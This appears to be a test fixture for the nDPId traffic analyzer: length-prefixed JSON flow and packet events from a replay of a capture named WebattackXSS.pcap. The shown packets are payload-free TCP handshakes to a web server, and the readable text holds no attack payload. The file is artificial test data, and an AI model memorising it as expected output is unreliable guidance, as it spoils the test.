-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6751,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":2,"flow_last_seen":1499347776754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347776754,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7ZCBpSP4rUHUpKAScSB31wAAAgQFtAQCCAoD5c99ATv+CQEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6752,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":478,"flow_packet_id":3,"flow_last_seen":1499347776754,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347776754,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KqtAAD4Gmy2sEAABwKgKMu2QAFCtQdSkgaUj+YAQAOUW3wAAAQEICgE7\/gkD5c99"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347779333,"flow_last_seen":1499347779333,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347779333,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60842,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6768,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":1,"flow_last_seen":1499347779333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347779333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8eChAAD4GTaisEAABwKgKMu2qAFDZQnimAAAAAKACchAdVgAAAgQFtAQCCAoBPACOAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6769,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":2,"flow_last_seen":1499347779333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347779333,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7aoAKzpS2UJ4p6AScSAN0AAAAgQFtAQCCAoD5dICATwAjgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6770,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":479,"flow_packet_id":3,"flow_last_seen":1499347779333,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347779333,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0eClAAD4GTa+sEAABwKgKMu2qAFDZQninACs6U4AQAOWs1wAAAQEICgE8AI4D5dIC"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347780605,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347780605,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60856,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6780,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":1,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347780605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Kg9AAD4Gm8GsEAABwKgKMu24AFBtBSvDAAAAAKACchDVKgAAAgQFtAQCCAoBPAHMAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6781,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":2,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347780605,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7bgVufFFbQUrxKAScSD35AAAAgQFtAQCCAoD5dNAATwBzAEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6782,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":480,"flow_packet_id":3,"flow_last_seen":1499347780605,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347780605,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0KhBAAD4Gm8isEAABwKgKMu24AFBtBSvEFbnxRoAQAOWW7AAAAQEICgE8AcwD5dNA"} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":407,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347655367,"flow_last_seen":1499347660809,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59516,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":408,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347656622,"flow_last_seen":1499347661802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59530,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":409,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347659123,"flow_last_seen":1499347664799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59556,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":410,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347660441,"flow_last_seen":1499347665799,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59570,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":411,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347661705,"flow_last_seen":1499347666802,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6798,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":412,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347664226,"flow_last_seen":1499347669803,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347781915,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59610,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347783176,"flow_last_seen":1499347783176,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347783176,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60882,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6801,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":1,"flow_last_seen":1499347783176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347783176,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8URhAAD4GdLisEAABwKgKMu3SAFAelFVWAAAAAKACchD3bAAAAgQFtAQCCAoBPAROAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6802,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":2,"flow_last_seen":1499347783176,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347783176,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7dLS\/qxUHpRVV6AScSCfTwAAAgQFtAQCCAoD5dXDATwETgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6803,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":481,"flow_packet_id":3,"flow_last_seen":1499347783177,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347783177,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0URlAAD4GdL+sEAABwKgKMu3SAFAelFVX0v6sVYAQAOU+VgAAAQEICgE8BE8D5dXD"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6810,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347784519,"flow_last_seen":1499347784519,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347784519,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60896,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6810,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":1,"flow_last_seen":1499347784519,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347784519,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CDdAAD4GvZmsEAABwKgKMu3gAFDyig2pAAAAAKACchBpxQAAAgQFtAQCCAoBPAWeAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6811,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":2,"flow_last_seen":1499347784520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347784520,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7eBCNUBH8ooNqqAScSANLwAAAgQFtAQCCAoD5dcTATwFngEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6812,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":482,"flow_packet_id":3,"flow_last_seen":1499347784520,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347784520,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CDhAAD4GvaCsEAABwKgKMu3gAFDyig2qQjVASIAQAOWsNQAAAQEICgE8BZ8D5dcT"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347787097,"flow_last_seen":1499347787097,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347787097,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60922,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6831,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":1,"flow_last_seen":1499347787097,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347787097,"pkt":"ABm5CmnxAMGxFOsxCABFAAA87ftAAD4G19SsEAABwKgKMu36AFCLoOXYAAAAAKACchD14AAAAgQFtAQCCAoBPAgjAAAAAAEDAwc="} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6832,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":2,"flow_last_seen":1499347787098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347787098,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7fr\/T2fti6Dl2aAScSCyBQAAAgQFtAQCCAoD5dmXATwIIwEDAwc="} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6833,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":483,"flow_packet_id":3,"flow_last_seen":1499347787098,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347787098,"pkt":"ABm5CmnxAMGxFOsxCABFAAA07fxAAD4G19usEAABwKgKMu36AFCLoOXZ\/09n7oAQAOVRDQAAAQEICgE8CCMD5dmX"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347788375,"flow_last_seen":1499347788375,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347788375,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60936,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6840,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":1,"flow_last_seen":1499347788375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347788375,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8h61AAD4GPiOsEAABwKgKMu4IAFB6rY7PAAAAAKACchBckAAAAgQFtAQCCAoBPAliAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6841,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":2,"flow_last_seen":1499347788375,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347788375,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7gg8gqx8eq2O0KAScSCVswAAAgQFtAQCCAoD5drXATwJYgEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6842,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":484,"flow_packet_id":3,"flow_last_seen":1499347788376,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347788376,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0h65AAD4GPiqsEAABwKgKMu4IAFB6rY7QPIKsfYAQAOU0uwAAAQEICgE8CWID5drX"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6852,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347789640,"flow_last_seen":1499347789640,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347789640,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60950,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6852,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":1,"flow_last_seen":1499347789640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347789640,"pkt":"ABm5CmnxAMGxFOsxCABFAAA83o1AAD4G50KsEAABwKgKMu4WAFDDudQTAAAAAKACchDM9QAAAgQFtAQCCAoBPAqeAAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6853,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":2,"flow_last_seen":1499347789640,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347789640,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7hacXl08w7nUFKAScSD0QAAAAgQFtAQCCAoD5dwTATwKngEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6854,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":485,"flow_packet_id":3,"flow_last_seen":1499347789641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347789641,"pkt":"ABm5CmnxAMGxFOsxCABFAAA03o5AAD4G50msEAABwKgKMu4WAFDDudQUnF5dPYAQAOWTRwAAAQEICgE8Cp8D5dwT"} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":6871,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347792291,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347792291,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":60976,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6871,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":1,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347792291,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8GCRAAD4GraysEAABwKgKMu4wAFDmKhURAAAAAKACchBm1gAAAgQFtAQCCAoBPA01AAAAAAEDAwc="} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6872,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":2,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347792291,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ7jDnRnKf5ioVEqAScSArPwAAAgQFtAQCCAoD5d6qATwNNQEDAwc="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6873,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":486,"flow_packet_id":3,"flow_last_seen":1499347792291,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347792291,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0GCVAAD4GrbOsEAABwKgKMu4wAFDmKhUS50ZyoIAQAOXKRgAAAQEICgE8DTUD5d6q"} -00813{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6879,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":380,"flow_state":"finished","flow_packets_processed":321,"flow_first_seen":1499347611162,"flow_last_seen":1499347679227,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232367,"flow_avg_l4_payload_len":723,"midstream":0,"thread_ts_msec":1499347792837,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":59042,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": 